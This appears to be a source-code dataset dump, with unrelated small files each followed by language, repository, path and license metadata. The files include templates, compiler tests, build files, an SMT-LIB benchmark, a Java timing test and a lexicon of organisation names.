<td class="{{#classNames}}{{.}} {{/classNames}}">
{{#checkbox}}
<input type="checkbox" name="{{value}}"/>
{{/checkbox}}
{{^checkbox}}
{{#url}}<a href="{{.}}"></span>{{/url}}{{#hint}}<abbr title="{{.}}">{{/hint}}{{value}}</a>{{#hint}}</abbr>{{/hint}}
{{/checkbox}}
</td> | HTML+Django | 3 | easyteacher/joplin | packages/server/src/views/partials/tableRowItem.mustache | [
"MIT"
] |
.bytecode 50.0
.class A
.super java/lang/Object
.method m()V
invokestatic A/a_A001()V
invokestatic A/b_A003()V
invokestatic A/c_A005()I
pop
invokestatic T/d()I
pop
return
.limit locals 1
.limit stack 1
.end method
.method private static synthetic a_A001()V
new d2j/gen/MI__000
dup
aconst_null
aconst_null
iconst_0
invokespecial d2j/gen/MI__000/<init>(Ljava/lang/Object;[Ljava/lang/Object;I)V
invokestatic B/a(Lp;)Ljava/lang/Object;
pop
return
.limit locals 0
.limit stack 5
.end method
.method public static a_CB002([Ljava/lang/Object;)Ljava/lang/Object;
invokestatic T/a()V
aconst_null
areturn
.limit locals 1
.limit stack 1
.end method
.method private static synthetic b_A003()V
new d2j/gen/MI__000
dup
aconst_null
aconst_null
iconst_1
invokespecial d2j/gen/MI__000/<init>(Ljava/lang/Object;[Ljava/lang/Object;I)V
invokestatic B/b(Lp;)V
return
.limit locals 0
.limit stack 5
.end method
.method public static b_CB004([Ljava/lang/Object;)Ljava/lang/Object;
invokestatic T/b()V
aconst_null
areturn
.limit locals 1
.limit stack 1
.end method
.method private static synthetic c_A005()I
new d2j/gen/MI__000
dup
aconst_null
aconst_null
iconst_2
invokespecial d2j/gen/MI__000/<init>(Ljava/lang/Object;[Ljava/lang/Object;I)V
invokestatic B/c(Lp;)Ljava/lang/Object;
checkcast java/lang/Number
invokevirtual java/lang/Number/intValue()I
ireturn
.limit locals 0
.limit stack 5
.end method
.method public static c_CB006([Ljava/lang/Object;)Ljava/lang/Object;
invokestatic T/c()I
invokestatic java/lang/Integer/valueOf(I)Ljava/lang/Integer;
areturn
.limit locals 1
.limit stack 1
.end method
| Jasmin | 1 | Mrack/dex2jar | dex-tools/src/test/resources/weave/c-after.j | [
"Apache-2.0"
] |
method ack (m : Number, n : Number) -> Number {
print "ack {m} {n}"
if (m < = 0) then {n + 1}
elseif {n <= 0} then {ack((m -1), 1)}
else {ack(m -1, ack(m, n-1))}
} | Grace | 4 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Grace/ackerman_function.grace | [
"MIT"
] |
new arr1[];
new arr2[5][];
new arr3[5][][5];
new arr4[5][5];
new arr5[][];
f1(arr[]) {
#pragma unused arr
}
f2(arr[5][]) {
#pragma unused arr
}
f3(arr[5][][5]) {
#pragma unused arr
}
f4(arr[5][5]) {
#pragma unused arr
}
f5(arr[][]) {
#pragma unused arr
}
main () {
arr1[0] = 0;
arr2[0][0] = 0;
arr3[0][0][0] = 0;
arr4[0][0] = 0;
arr5[0][0] = 0;
new a = sizeof(arr1);
a = sizeof(arr1[]);
a = sizeof(arr5[][]);
#pragma unused a
f1(arr1);
f2(arr2);
f3(arr3);
f4(arr4);
f5(arr5);
}
| PAWN | 2 | pawn-lang/pawn | source/compiler/tests/md_array_size_chk_gh_314.pwn | [
"Zlib"
] |
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<PropertyGroup>
<RootNamespace>SampleServer</RootNamespace>
<OutputType>WinExe</OutputType>
<AssemblyName>SampleServer</AssemblyName>
<AllowGlobals>False</AllowGlobals>
<AllowLegacyCreate>False</AllowLegacyCreate>
<ApplicationIcon>Properties\App.ico</ApplicationIcon>
<Configuration Condition="'$(Configuration)' == ''">Release</Configuration>
<ProjectGuid>{90E5FBCE-0445-40DB-BEC8-933B393487FE}</ProjectGuid>
<TargetFramework>.NETFramework4.0</TargetFramework>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)' == 'Debug' ">
<DefineConstants>DEBUG;TRACE;</DefineConstants>
<OutputPath>.\bin\Debug</OutputPath>
<GeneratePDB>True</GeneratePDB>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)' == 'Release' ">
<OutputPath>.\bin\Release</OutputPath>
<EnableAsserts>False</EnableAsserts>
</PropertyGroup>
<ItemGroup>
<Reference Include="mscorlib" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
<ProjectReference Include="RemObjects.InternetPack.Echoes">
<Project>{774B9AE9-B695-4908-B24F-5482556D6175}</Project>
<ProjectFile>..\..\..\Source\RemObjects.InternetPack.Echoes.elements</ProjectFile>
<Private>True</Private>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<Compile Include="Properties\AssemblyInfo.pas" />
<Compile Include="MainForm.pas">
<SubType>Form</SubType>
<DesignableClassName>SampleServer.MainForm</DesignableClassName>
</Compile>
<Content Include="Properties\App.ico">
<SubType>Content</SubType>
</Content>
<EmbeddedResource Include="MainForm.resx" />
<Content Include="HttpRoot\index.html">
<CopyToOutputDirectory>PreserveNewest</CopyToOutputDirectory>
</Content>
<Content Include="HttpRoot\ip.png">
<CopyToOutputDirectory>PreserveNewest</CopyToOutputDirectory>
</Content>
<Content Include="HttpRoot\Styles.css">
<CopyToOutputDirectory>PreserveNewest</CopyToOutputDirectory>
</Content>
</ItemGroup>
<ItemGroup>
<Folder Include="HttpRoot\" />
<Folder Include="Properties\" />
</ItemGroup>
<Import Project="$(MSBuildExtensionsPath)\RemObjects Software\Elements\RemObjects.Elements.Echoes.targets" />
<PropertyGroup>
<PreBuildEvent />
</PropertyGroup>
</Project> | Oxygene | 3 | remobjects/internetpack | Samples/Oxygene/Sample Server/SampleServer.oxygene | [
"BSD-2-Clause"
] |
size: 200mm 300mm;
dpi: 240;
| CLIPS | 0 | asmuth-archive/travistest | test/layer/resize_mm_dpi.clp | [
"Apache-2.0"
] |
/**
* This file is part of the Phalcon Framework.
*
* (c) Phalcon Team <team@phalcon.io>
*
* For the full copyright and license information, please view the LICENSE.txt
* file that was distributed with this source code.
*/
namespace Phalcon\Mvc\Model;
use Phalcon\Mvc\ModelInterface;
/**
* Phalcon\Mvc\Model\BehaviorInterface
*
* Interface for Phalcon\Mvc\Model\Behavior
*/
interface BehaviorInterface
{
/**
* Calls a method when it's missing in the model
*/
public function missingMethod(<ModelInterface> model, string! method, array arguments = []);
/**
* This method receives the notifications from the EventsManager
*/
public function notify(string! type, <ModelInterface> model);
}
| Zephir | 4 | tidytrax/cphalcon | phalcon/Mvc/Model/BehaviorInterface.zep | [
"BSD-3-Clause"
] |
.example-stretched-tabs {
max-width: 800px;
}
| CSS | 1 | MarkArranz/material2 | src/material-examples/tab-group-stretched/tab-group-stretched-example.css | [
"MIT"
] |
load 'tables/csv'
pop_table =: readcsv 'world-population.csv'
get_country =: 4 : '(0 { x = (< y))'
country_table =: monad : ', (#~ ((get_country & y) " 1)) pop_table'
country_total =: monad : 'makenum 1 { country_table y'
NB. two-letter abbreviations based on domain codes
us_pop =: country_total 'United States of America'
it_pop =: country_total 'Italy'
fr_pop =: country_total 'France'
vn_pop =: country_total 'Viet Nam'
sk_pop =: country_total 'Republic of Korea'
nz_pop =: country_total 'New Zealand'
de_pop =: country_total 'Germany'
se_pop =: country_total 'Sweden'
dk_pop =: country_total 'Denmark'
no_pop =: country_total 'Norway'
fi_pop =: country_total 'Finland'
es_pop =: country_total 'Spain'
macau_pop =: country_total 'China, Macao SAR'
taiwan_pop =: country_total 'China, Taiwan Province of China'
br_pop =: country_total 'Brazil'
thailand_pop =: country_total 'Thailand'
malaysia_pop =: country_total 'Malaysia'
in_pop =: country_total 'India'
uk_pop =: country_total 'United Kingdom'
nl_pop =: country_total 'Netherlands'
sg_pop =: country_total 'Singapore'
be_pop =: country_total 'Belgium'
au_pop =: country_total 'Australia'
cn_pop =: country_total 'China'
ca_pop =: country_total 'Canada'
jp_pop =: country_total 'Japan'
kenya_pop =: country_total 'Kenya'
is_pop =: country_total 'Iceland'
sn_pop =: country_total 'Senegal'
rw_pop =: country_total 'Rwanda'
pe_pop =: country_total 'Peru'
za_pop =: country_total 'South Africa'
ie_pop =: country_total 'Ireland'
pt_pop =: country_total 'Portugal'
at_pop =: country_total 'Austria'
ch_pop =: country_total 'Switzerland'
| J | 3 | vmchale/coronavirus | world-population.ijs | [
"BSD-3-Clause"
] |
public IViewDemo: IView {
name = ''
css_class = ''
set_css_class(names String) {
this.css_class = names
return this
}
}
| Tea | 2 | jackwiy/tea | tests/xview/IViewDemo.tea | [
"Apache-2.0"
] |
(set-info :smt-lib-version 2.6)
(set-logic QF_UFLRA)
(set-info :source |CPAchecker with k-induction on SV-COMP14 program using MathSAT5, submitted by Philipp Wendler, http://cpachecker.sosy-lab.org|)
(set-info :category "industrial")
(set-info :status unsat)
(define-fun _1 () Bool true)
(declare-fun |main::lk4@6| () Real)
(declare-fun |main::lk2@3| () Real)
(declare-fun |main::lk4@2| () Real)
(declare-fun |main::lk3@2| () Real)
(declare-fun |main::lk1@6| () Real)
(declare-fun |main::lk5@2| () Real)
(declare-fun |main::lk3@5| () Real)
(declare-fun |main::cond@3| () Real)
(declare-fun |main::lk6@2| () Real)
(declare-fun |main::p7@1| () Real)
(declare-fun |main::p5@1| () Real)
(declare-fun |main::lk3@4| () Real)
(declare-fun |main::lk1@2| () Real)
(declare-fun |main::lk5@7| () Real)
(declare-fun |main::lk4@3| () Real)
(declare-fun |main::lk2@7| () Real)
(declare-fun |main::lk6@3| () Real)
(declare-fun |main::lk1@7| () Real)
(declare-fun |main::lk6@4| () Real)
(declare-fun |main::lk8@2| () Real)
(declare-fun |main::lk8@3| () Real)
(declare-fun |main::lk1@3| () Real)
(declare-fun |main::lk2@6| () Real)
(declare-fun |main::lk4@4| () Real)
(declare-fun |main::lk6@5| () Real)
(declare-fun |main::lk7@4| () Real)
(declare-fun |main::p3@1| () Real)
(declare-fun |main::lk1@4| () Real)
(declare-fun |main::lk8@5| () Real)
(declare-fun |main::lk4@5| () Real)
(declare-fun |main::p8@1| () Real)
(declare-fun |main::lk8@4| () Real)
(declare-fun |main::lk2@4| () Real)
(declare-fun |main::lk5@4| () Real)
(declare-fun |main::lk2@5| () Real)
(declare-fun |main::lk4@7| () Real)
(declare-fun |main::p4@1| () Real)
(declare-fun |main::p2@1| () Real)
(declare-fun |main::p6@1| () Real)
(declare-fun |main::cond@2| () Real)
(declare-fun |main::lk3@6| () Real)
(declare-fun |main::p1@1| () Real)
(declare-fun |main::lk7@2| () Real)
(declare-fun |main::lk2@2| () Real)
(declare-fun |main::lk7@3| () Real)
(declare-fun |main::lk7@6| () Real)
(declare-fun |main::lk3@7| () Real)
(declare-fun |main::lk5@5| () Real)
(declare-fun |main::lk8@6| () Real)
(declare-fun |main::lk7@7| () Real)
(declare-fun |main::lk6@7| () Real)
(declare-fun |main::lk5@6| () Real)
(declare-fun |main::lk7@5| () Real)
(declare-fun |main::lk6@6| () Real)
(declare-fun |main::lk3@3| () Real)
(declare-fun |main::lk5@3| () Real)
(declare-fun |main::lk1@5| () Real)
(define-fun _7 () Real 0)
(define-fun _75 () Real |main::cond@3|)
(define-fun _76 () Bool (= _75 _7))
(define-fun _77 () Real 1)
(define-fun _80 () Bool (not _76))
(define-fun _82 () Real |main::lk1@3|)
(define-fun _85 () Real |main::lk2@3|)
(define-fun _88 () Real |main::lk3@3|)
(define-fun _91 () Real |main::lk4@3|)
(define-fun _94 () Real |main::lk5@3|)
(define-fun _97 () Real |main::lk6@3|)
(define-fun _100 () Real |main::lk7@3|)
(define-fun _103 () Real |main::lk8@3|)
(define-fun _112 () Real |main::lk1@4|)
(define-fun _115 () Bool (= _82 _112))
(define-fun _124 () Real |main::lk2@4|)
(define-fun _127 () Bool (= _85 _124))
(define-fun _136 () Real |main::lk3@4|)
(define-fun _139 () Bool (= _88 _136))
(define-fun _148 () Real |main::lk4@4|)
(define-fun _151 () Bool (= _91 _148))
(define-fun _160 () Real |main::lk5@4|)
(define-fun _163 () Bool (= _94 _160))
(define-fun _172 () Real |main::lk6@4|)
(define-fun _175 () Bool (= _97 _172))
(define-fun _184 () Real |main::lk7@4|)
(define-fun _187 () Bool (= _100 _184))
(define-fun _196 () Real |main::lk8@4|)
(define-fun _199 () Bool (= _103 _196))
(define-fun _208 () Real |main::lk1@5|)
(define-fun _209 () Bool (= _208 _7))
(define-fun _220 () Real |main::lk2@5|)
(define-fun _221 () Bool (= _220 _7))
(define-fun _232 () Real |main::lk3@5|)
(define-fun _233 () Bool (= _232 _7))
(define-fun _244 () Real |main::lk4@5|)
(define-fun _245 () Bool (= _244 _7))
(define-fun _256 () Real |main::lk5@5|)
(define-fun _257 () Bool (= _256 _7))
(define-fun _268 () Real |main::lk6@5|)
(define-fun _269 () Bool (= _268 _7))
(define-fun _280 () Real |main::lk7@5|)
(define-fun _281 () Bool (= _280 _7))
(define-fun _292 () Real |main::lk8@5|)
(define-fun _293 () Bool (= _292 _7))
(define-fun _338 () Real |main::cond@2|)
(define-fun _339 () Bool (= _338 _7))
(define-fun _341 () Bool (not _339))
(define-fun _342 () Real |main::lk1@2|)
(define-fun _343 () Bool (= _342 _7))
(define-fun _344 () Bool (and _341 _343))
(define-fun _345 () Real |main::lk2@2|)
(define-fun _346 () Bool (= _345 _7))
(define-fun _347 () Bool (and _344 _346))
(define-fun _348 () Real |main::lk3@2|)
(define-fun _349 () Bool (= _348 _7))
(define-fun _350 () Bool (and _347 _349))
(define-fun _351 () Real |main::lk4@2|)
(define-fun _352 () Bool (= _351 _7))
(define-fun _353 () Bool (and _350 _352))
(define-fun _354 () Real |main::lk5@2|)
(define-fun _355 () Bool (= _354 _7))
(define-fun _356 () Bool (and _353 _355))
(define-fun _357 () Real |main::lk6@2|)
(define-fun _358 () Bool (= _357 _7))
(define-fun _359 () Bool (and _356 _358))
(define-fun _360 () Real |main::lk7@2|)
(define-fun _361 () Bool (= _360 _7))
(define-fun _362 () Bool (and _359 _361))
(define-fun _363 () Real |main::lk8@2|)
(define-fun _364 () Bool (= _363 _7))
(define-fun _365 () Bool (and _362 _364))
(define-fun _366 () Real |main::p1@1|)
(define-fun _367 () Bool (= _366 _7))
(define-fun _368 () Bool (not _367))
(define-fun _370 () Bool (and _365 _368))
(define-fun _371 () Bool (and _365 _367))
(define-fun _372 () Bool (= _82 _77))
(define-fun _373 () Bool (and _370 _372))
(define-fun _374 () Bool (= _82 _342))
(define-fun _375 () Bool (and _371 _374))
(define-fun _376 () Bool (or _373 _375))
(define-fun _377 () Real |main::p2@1|)
(define-fun _378 () Bool (= _377 _7))
(define-fun _379 () Bool (not _378))
(define-fun _381 () Bool (and _376 _379))
(define-fun _382 () Bool (and _376 _378))
(define-fun _383 () Bool (= _85 _77))
(define-fun _384 () Bool (and _381 _383))
(define-fun _385 () Bool (= _85 _345))
(define-fun _386 () Bool (and _382 _385))
(define-fun _387 () Bool (or _384 _386))
(define-fun _388 () Real |main::p3@1|)
(define-fun _389 () Bool (= _388 _7))
(define-fun _390 () Bool (not _389))
(define-fun _392 () Bool (and _387 _390))
(define-fun _393 () Bool (and _387 _389))
(define-fun _394 () Bool (= _88 _77))
(define-fun _395 () Bool (and _392 _394))
(define-fun _396 () Bool (= _88 _348))
(define-fun _397 () Bool (and _393 _396))
(define-fun _398 () Bool (or _395 _397))
(define-fun _399 () Real |main::p4@1|)
(define-fun _400 () Bool (= _399 _7))
(define-fun _401 () Bool (not _400))
(define-fun _403 () Bool (and _398 _401))
(define-fun _404 () Bool (and _398 _400))
(define-fun _405 () Bool (= _91 _77))
(define-fun _406 () Bool (and _403 _405))
(define-fun _407 () Bool (= _91 _351))
(define-fun _408 () Bool (and _404 _407))
(define-fun _409 () Bool (or _406 _408))
(define-fun _410 () Real |main::p5@1|)
(define-fun _411 () Bool (= _410 _7))
(define-fun _412 () Bool (not _411))
(define-fun _414 () Bool (and _409 _412))
(define-fun _415 () Bool (and _409 _411))
(define-fun _416 () Bool (= _94 _77))
(define-fun _417 () Bool (and _414 _416))
(define-fun _418 () Bool (= _94 _354))
(define-fun _419 () Bool (and _415 _418))
(define-fun _420 () Bool (or _417 _419))
(define-fun _421 () Real |main::p6@1|)
(define-fun _422 () Bool (= _421 _7))
(define-fun _423 () Bool (not _422))
(define-fun _425 () Bool (and _420 _423))
(define-fun _426 () Bool (and _420 _422))
(define-fun _427 () Bool (= _97 _77))
(define-fun _428 () Bool (and _425 _427))
(define-fun _429 () Bool (= _97 _357))
(define-fun _430 () Bool (and _426 _429))
(define-fun _431 () Bool (or _428 _430))
(define-fun _432 () Real |main::p7@1|)
(define-fun _433 () Bool (= _432 _7))
(define-fun _434 () Bool (not _433))
(define-fun _436 () Bool (and _431 _434))
(define-fun _437 () Bool (and _431 _433))
(define-fun _438 () Bool (= _100 _77))
(define-fun _439 () Bool (and _436 _438))
(define-fun _440 () Bool (= _100 _360))
(define-fun _441 () Bool (and _437 _440))
(define-fun _442 () Bool (or _439 _441))
(define-fun _443 () Real |main::p8@1|)
(define-fun _444 () Bool (= _443 _7))
(define-fun _445 () Bool (not _444))
(define-fun _447 () Bool (and _442 _445))
(define-fun _448 () Bool (and _442 _444))
(define-fun _449 () Bool (= _103 _77))
(define-fun _450 () Bool (and _447 _449))
(define-fun _451 () Bool (= _103 _363))
(define-fun _452 () Bool (and _448 _451))
(define-fun _453 () Bool (or _450 _452))
(define-fun _454 () Bool (and _368 _453))
(define-fun _455 () Bool (and _367 _453))
(define-fun _459 () Bool (and _372 _454))
(define-fun _460 () Bool (= _112 _7))
(define-fun _461 () Bool (and _459 _460))
(define-fun _462 () Bool (and _115 _455))
(define-fun _463 () Bool (or _461 _462))
(define-fun _464 () Bool (and _379 _463))
(define-fun _465 () Bool (and _378 _463))
(define-fun _469 () Bool (and _383 _464))
(define-fun _470 () Bool (= _124 _7))
(define-fun _471 () Bool (and _469 _470))
(define-fun _472 () Bool (and _127 _465))
(define-fun _473 () Bool (or _471 _472))
(define-fun _474 () Bool (and _390 _473))
(define-fun _475 () Bool (and _389 _473))
(define-fun _479 () Bool (and _394 _474))
(define-fun _480 () Bool (= _136 _7))
(define-fun _481 () Bool (and _479 _480))
(define-fun _482 () Bool (and _139 _475))
(define-fun _483 () Bool (or _481 _482))
(define-fun _484 () Bool (and _401 _483))
(define-fun _485 () Bool (and _400 _483))
(define-fun _489 () Bool (and _405 _484))
(define-fun _490 () Bool (= _148 _7))
(define-fun _491 () Bool (and _489 _490))
(define-fun _492 () Bool (and _151 _485))
(define-fun _493 () Bool (or _491 _492))
(define-fun _494 () Bool (and _412 _493))
(define-fun _495 () Bool (and _411 _493))
(define-fun _499 () Bool (and _416 _494))
(define-fun _500 () Bool (= _160 _7))
(define-fun _501 () Bool (and _499 _500))
(define-fun _502 () Bool (and _163 _495))
(define-fun _503 () Bool (or _501 _502))
(define-fun _504 () Bool (and _423 _503))
(define-fun _505 () Bool (and _422 _503))
(define-fun _509 () Bool (and _427 _504))
(define-fun _510 () Bool (= _172 _7))
(define-fun _511 () Bool (and _509 _510))
(define-fun _512 () Bool (and _175 _505))
(define-fun _513 () Bool (or _511 _512))
(define-fun _514 () Bool (and _434 _513))
(define-fun _515 () Bool (and _433 _513))
(define-fun _519 () Bool (and _438 _514))
(define-fun _520 () Bool (= _184 _7))
(define-fun _521 () Bool (and _519 _520))
(define-fun _522 () Bool (and _187 _515))
(define-fun _523 () Bool (or _521 _522))
(define-fun _524 () Bool (and _445 _523))
(define-fun _525 () Bool (and _444 _523))
(define-fun _529 () Bool (and _449 _524))
(define-fun _530 () Bool (= _196 _7))
(define-fun _531 () Bool (and _529 _530))
(define-fun _532 () Bool (and _199 _525))
(define-fun _533 () Bool (or _531 _532))
(define-fun _535 () Bool (and _80 _533))
(define-fun _563 () Bool (and _209 _535))
(define-fun _564 () Bool (and _221 _563))
(define-fun _565 () Bool (and _233 _564))
(define-fun _566 () Bool (and _245 _565))
(define-fun _567 () Bool (and _257 _566))
(define-fun _568 () Bool (and _269 _567))
(define-fun _569 () Bool (and _281 _568))
(define-fun _570 () Bool (and _293 _569))
(define-fun _571 () Bool (and _368 _570))
(define-fun _572 () Bool (and _367 _570))
(define-fun _573 () Real |main::lk1@6|)
(define-fun _574 () Bool (= _573 _77))
(define-fun _575 () Bool (and _571 _574))
(define-fun _576 () Bool (= _208 _573))
(define-fun _577 () Bool (and _572 _576))
(define-fun _578 () Bool (or _575 _577))
(define-fun _579 () Bool (and _379 _578))
(define-fun _580 () Bool (and _378 _578))
(define-fun _581 () Real |main::lk2@6|)
(define-fun _582 () Bool (= _581 _77))
(define-fun _583 () Bool (and _579 _582))
(define-fun _584 () Bool (= _220 _581))
(define-fun _585 () Bool (and _580 _584))
(define-fun _586 () Bool (or _583 _585))
(define-fun _587 () Bool (and _390 _586))
(define-fun _588 () Bool (and _389 _586))
(define-fun _589 () Real |main::lk3@6|)
(define-fun _590 () Bool (= _589 _77))
(define-fun _591 () Bool (and _587 _590))
(define-fun _592 () Bool (= _232 _589))
(define-fun _593 () Bool (and _588 _592))
(define-fun _594 () Bool (or _591 _593))
(define-fun _595 () Bool (and _401 _594))
(define-fun _596 () Bool (and _400 _594))
(define-fun _597 () Real |main::lk4@6|)
(define-fun _598 () Bool (= _597 _77))
(define-fun _599 () Bool (and _595 _598))
(define-fun _600 () Bool (= _244 _597))
(define-fun _601 () Bool (and _596 _600))
(define-fun _602 () Bool (or _599 _601))
(define-fun _603 () Bool (and _412 _602))
(define-fun _604 () Bool (and _411 _602))
(define-fun _605 () Real |main::lk5@6|)
(define-fun _606 () Bool (= _605 _77))
(define-fun _607 () Bool (and _603 _606))
(define-fun _608 () Bool (= _256 _605))
(define-fun _609 () Bool (and _604 _608))
(define-fun _610 () Bool (or _607 _609))
(define-fun _611 () Bool (and _423 _610))
(define-fun _612 () Bool (and _422 _610))
(define-fun _613 () Real |main::lk6@6|)
(define-fun _614 () Bool (= _613 _77))
(define-fun _615 () Bool (and _611 _614))
(define-fun _616 () Bool (= _268 _613))
(define-fun _617 () Bool (and _612 _616))
(define-fun _618 () Bool (or _615 _617))
(define-fun _619 () Bool (and _434 _618))
(define-fun _620 () Bool (and _433 _618))
(define-fun _621 () Real |main::lk7@6|)
(define-fun _622 () Bool (= _621 _77))
(define-fun _623 () Bool (and _619 _622))
(define-fun _624 () Bool (= _280 _621))
(define-fun _625 () Bool (and _620 _624))
(define-fun _626 () Bool (or _623 _625))
(define-fun _627 () Bool (and _445 _626))
(define-fun _628 () Bool (and _444 _626))
(define-fun _629 () Real |main::lk8@6|)
(define-fun _630 () Bool (= _629 _77))
(define-fun _631 () Bool (and _627 _630))
(define-fun _632 () Bool (= _292 _629))
(define-fun _633 () Bool (and _628 _632))
(define-fun _634 () Bool (or _631 _633))
(define-fun _635 () Bool (and _368 _634))
(define-fun _636 () Bool (and _367 _634))
(define-fun _640 () Bool (and _574 _635))
(define-fun _659 () Real |main::lk1@7|)
(define-fun _660 () Bool (= _659 _7))
(define-fun _661 () Bool (and _640 _660))
(define-fun _662 () Bool (= _573 _659))
(define-fun _663 () Bool (and _636 _662))
(define-fun _664 () Bool (or _661 _663))
(define-fun _665 () Bool (and _379 _664))
(define-fun _666 () Bool (and _378 _664))
(define-fun _670 () Bool (and _582 _665))
(define-fun _682 () Real |main::lk2@7|)
(define-fun _683 () Bool (= _682 _7))
(define-fun _684 () Bool (and _670 _683))
(define-fun _685 () Bool (= _581 _682))
(define-fun _686 () Bool (and _666 _685))
(define-fun _687 () Bool (or _684 _686))
(define-fun _688 () Bool (and _390 _687))
(define-fun _689 () Bool (and _389 _687))
(define-fun _693 () Bool (and _590 _688))
(define-fun _704 () Real |main::lk3@7|)
(define-fun _705 () Bool (= _704 _7))
(define-fun _706 () Bool (and _693 _705))
(define-fun _707 () Bool (= _589 _704))
(define-fun _708 () Bool (and _689 _707))
(define-fun _709 () Bool (or _706 _708))
(define-fun _710 () Bool (and _401 _709))
(define-fun _711 () Bool (and _400 _709))
(define-fun _715 () Bool (and _598 _710))
(define-fun _725 () Real |main::lk4@7|)
(define-fun _726 () Bool (= _725 _7))
(define-fun _727 () Bool (and _715 _726))
(define-fun _728 () Bool (= _597 _725))
(define-fun _729 () Bool (and _711 _728))
(define-fun _730 () Bool (or _727 _729))
(define-fun _731 () Bool (and _412 _730))
(define-fun _732 () Bool (and _411 _730))
(define-fun _736 () Bool (and _606 _731))
(define-fun _745 () Real |main::lk5@7|)
(define-fun _746 () Bool (= _745 _7))
(define-fun _747 () Bool (and _736 _746))
(define-fun _748 () Bool (= _605 _745))
(define-fun _749 () Bool (and _732 _748))
(define-fun _750 () Bool (or _747 _749))
(define-fun _751 () Bool (and _423 _750))
(define-fun _752 () Bool (and _422 _750))
(define-fun _756 () Bool (and _614 _751))
(define-fun _764 () Real |main::lk6@7|)
(define-fun _765 () Bool (= _764 _7))
(define-fun _766 () Bool (and _756 _765))
(define-fun _767 () Bool (= _613 _764))
(define-fun _768 () Bool (and _752 _767))
(define-fun _769 () Bool (or _766 _768))
(define-fun _770 () Bool (and _434 _769))
(define-fun _771 () Bool (and _433 _769))
(define-fun _775 () Bool (and _622 _770))
(define-fun _782 () Real |main::lk7@7|)
(define-fun _783 () Bool (= _782 _7))
(define-fun _784 () Bool (and _775 _783))
(define-fun _785 () Bool (= _621 _782))
(define-fun _786 () Bool (and _771 _785))
(define-fun _787 () Bool (or _784 _786))
(define-fun _788 () Bool (and _445 _787))
(define-fun _843 () Bool (not _710))
(define-fun _844 () Bool (or _598 _843))
(define-fun _846 () Bool (not _770))
(define-fun _847 () Bool (or _622 _846))
(define-fun _848 () Bool (and _844 _847))
(define-fun _850 () Bool (not _665))
(define-fun _851 () Bool (or _582 _850))
(define-fun _852 () Bool (and _848 _851))
(define-fun _854 () Bool (not _751))
(define-fun _855 () Bool (or _614 _854))
(define-fun _856 () Bool (and _852 _855))
(define-fun _858 () Bool (not _688))
(define-fun _859 () Bool (or _590 _858))
(define-fun _860 () Bool (and _856 _859))
(define-fun _862 () Bool (not _731))
(define-fun _863 () Bool (or _606 _862))
(define-fun _864 () Bool (and _860 _863))
(define-fun _866 () Bool (not _788))
(define-fun _867 () Bool (or _630 _866))
(define-fun _868 () Bool (and _864 _867))
(define-fun _870 () Bool (not _635))
(define-fun _871 () Bool (or _574 _870))
(define-fun _872 () Bool (and _868 _871))
(define-fun _873 () Bool (not _872))
(assert _1)
(assert _873)
(check-sat)
(exit)
| SMT | 2 | livinlife6751/infer | sledge/test/smt/QF_UFLRA/cpachecker-induction-svcomp14/cpachecker-induction.test_locks_8_true-unreach-call_false-termination.c.smt2 | [
"MIT"
] |
package com.baeldung.time;
import static org.junit.Assert.assertEquals;
import java.time.Duration;
import java.time.Instant;
import java.util.concurrent.TimeUnit;
import org.apache.commons.lang3.time.StopWatch;
import org.junit.Test;
public class ElapsedTimeManualTest {
@Test
public void givenRunningTask_whenMeasuringTimeWithCurrentTimeMillis_thenGetElapsedTime() throws InterruptedException {
long start = System.currentTimeMillis();
simulateRunningTask();
long finish = System.currentTimeMillis();
long timeElapsed = finish - start;
assertEquals(true, (2000L <= timeElapsed) && (timeElapsed <= 3000L));
}
@Test
public void giveRunningTask_whenMeasuringTimeWithNanoTime_thenGetElapsedTime() throws InterruptedException {
long start = System.nanoTime();
simulateRunningTask();
long finish = System.nanoTime();
long timeElapsed = finish - start;
assertEquals(true, (2000000000L <= timeElapsed) && (timeElapsed <= 3000000000L));
}
@Test
public void givenRunningTask_whenMeasuringTimeWithStopWatch_thenGetElapsedTime() throws InterruptedException {
StopWatch watch = new StopWatch();
watch.start();
simulateRunningTask();
watch.stop();
long timeElapsed = watch.getTime();
assertEquals(true, (2000L <= timeElapsed) && (timeElapsed <= 3000L));
}
/*
The below test depends on the elapsed time, which isn't ideal in a test.
Also, it slows down test execution artificially.
*/
@Test
public void givenRunningTask_whenMeasuringTimeWithInstantClass_thenGetElapsedTime() throws InterruptedException {
Instant start = Instant.now();
System.out.println("start: " + start);
simulateRunningTask();
Instant finish = Instant.now();
System.out.println("start: " + start);
System.out.println("finish: " + finish);
long timeElapsed = Duration.between(start, finish).toMillis();
System.out.println("elapsed: " + timeElapsed);
assertEquals(true, (2000L <= timeElapsed) && (timeElapsed <= 3000L));
}
/**
* Simulate task running for 2.5 seconds.
*
* @throws InterruptedException
*/
private static void simulateRunningTask() throws InterruptedException {
TimeUnit.MILLISECONDS.sleep(2500); // 2.5 seconds
}
}
| Java | 5 | DBatOWL/tutorials | core-java-modules/core-java-time-measurements/src/test/java/com/baeldung/time/ElapsedTimeManualTest.java | [
"MIT"
] |
CJK_WORD
上海合作组织/nt/shang hai he zuo zu zhi/null
世卫/nt/shi wei/null
世界卫生组织/nt/shi jie wei sheng zu zhi/null
世界银行/nt/shi jie yin hang/null
东盟/nt/dong meng/null
亚太经合组织/nt/ya tai jing he zu zhi/null
人权理事会/nt/ren quan li shi hui/null
六方会谈/nt/liu fang hui tan/null
北约/nt/bei yue/null
哈马斯/nt/ha ma si/null
安全理事会/nt/an quan li shi hui/null
安理会/nt/an li hui/null
欧佩克/nt/ou pei ke/null
红十字会/nt/hong shi zi hui/null
联合国/nt/lian he guo/null
| Lex | 1 | Wing-Luo/jcseg | vendors/lexicon/lex-org.lex | [
"Apache-2.0"
] |
INTERFACE zif_abapgit_ecatt_upload
PUBLIC .
METHODS:
set_stream_for_upload
IMPORTING
iv_xml TYPE xstring.
ENDINTERFACE.
| ABAP | 3 | jeevanrajv1901/ABAPGIT | src/objects/ecatt/zif_abapgit_ecatt_upload.intf.abap | [
"MIT"
] |
